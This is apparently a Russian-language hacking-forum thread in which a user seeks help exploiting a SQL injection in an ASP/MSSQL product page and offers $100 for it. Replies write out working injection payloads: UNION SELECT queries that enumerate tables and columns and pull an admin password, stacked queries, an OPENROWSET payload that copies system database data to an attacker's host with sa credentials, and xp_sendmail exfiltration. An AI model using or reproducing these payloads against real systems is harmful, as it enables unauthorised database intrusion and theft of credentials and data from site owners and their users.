Привет! нашел инъекцию следующего вида http://www.server.com/products.asp?cat=Cars' Code: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string 'CAR''. /include/ADOFunctions.asp, line 58 При попытке написать UNION: http://www.server.com/products.asp?cat=CAR'%20UNION%20ALL%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES-- ругается Code: Microsoft OLE DB Provider for SQL Server error '80040e14' Incorrect syntax near the keyword 'UNION'. /include/ADOFunctions.asp, line 58 Проверил синтакцис сто раз. фильтрации никакой, запросы вида http://www.server.com/products.asp?cat=CAR' or 1=1-- ругется на синтакцис "or". products.asp?cat=CAR';SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES-- работает без проблем, Думал фильтрует юнионы, оры и энды,но запрос вида products.asp?cat=CAR';SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES%20UNION%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES-- тоже успешно выполняется. Думал, что все фильтруется после кавычки, однако если ввести немного "подпорченный" запрос(последний прведенный), то он ругается. Помогите советом. Пасиб.
ДА вот по ходу еще два вопроса появилось 1)если юнион не пашет думаю сделать так Code: insert%20into%20OPENROWSET('SQLoledb',%20'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=hackersip,1433;',%20'select%20*%20from%20_sysdatabases')%20%20select%20*%20from%20master.dbo.sysdatabases-- Так вот, кто подскажет бесплатный хостинг, где разрешено подключатся к БД не только с локалхоста 2)еще хотелось бы использовать Code: '; exec master..xp_sendmail запускал без ошибок все прошло, но на мыло пока ничего не пришло Так вот, как узнать что sendmail - точно разрешен? Пасибо за внимание.
2 gadjet: тут подзапросом и не пахнет,хотя попробовал.=) 2 all: На ачате чтолько грамотных людей тусует, и мне никто не поможет?.может предложить денег?скажем 100 ваксов?
PHP: http://www.server.com/products.asp?cat=CAR'%20UNION%20SELECT%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES-- И поехали дальше: PHP: ?id=-1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- (допустим, первая таблица называется 'table1'). Узнать имя таблицы, не table1: ?id=-1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')-- Узнать имя таблицы, не table1, table2, table3: ?id=-1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1','table2','table2') -- Найти таблицу, в названии которой присутствует "user": ?id=-1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25user%25'-- Узнать имя первого столбца в "table1": ?id=-1 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="table1"-- Узнать имя столбца, не 'login_id', не 'login_name', не 'password',details': ?id=-1 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')-- Узнать пароль пользователя 'admin': ?id=-1 UNION SELECT TOP 1 password FROM users where login_name='admin'-- ?id=-1 (SELECT+TOP+1+Login+FROM+admin)-- ?id=-1 (UNION+SELECT+TOP+1+admin_password+FROM+admin)-- 100 баксов мне хватит - высылай =)
2 Elect: Уважаемый, я бы выслал деньги, если вы действительно ответили на вопрос=)) перечитайте что я писал выше, юнион здесь не помощь,если было бы ве так просто=) Думаю сдесь надо делать упор на "exec"
скорее всего у тебя синтаксис не правильный выходит в первом запросе... попробуй вместо ' ), '), )), ')) и так далее
pop_korn прежде чем советовать подумай. Xex а кто вообще сказал что там селект? введи order by 1. елси будет ругаться аналогично то там вообще не селект. возможно там `Cat` подставляется прямо в order by тут аналогично никакого юнион селекта не сделать. OPENROWSET Это безусловно удобная штука, но в большинстве случаев такие внешние вызовы блокируются фаерволом. master..xp_sendmail ОЧЕНЬ редко срабатывает тк во-первых, нужно иметь права админа или пользователя dbo, во-вторых, эта процедура напрямую взаимодействует с outlookoм и никому она в конечном счете вообще не нужна, поэтому с ней даже пытаться работать не советую. а то что проходит без ошибок в ответе скрипта не говорит о том что нет ошибки при выполнении запроса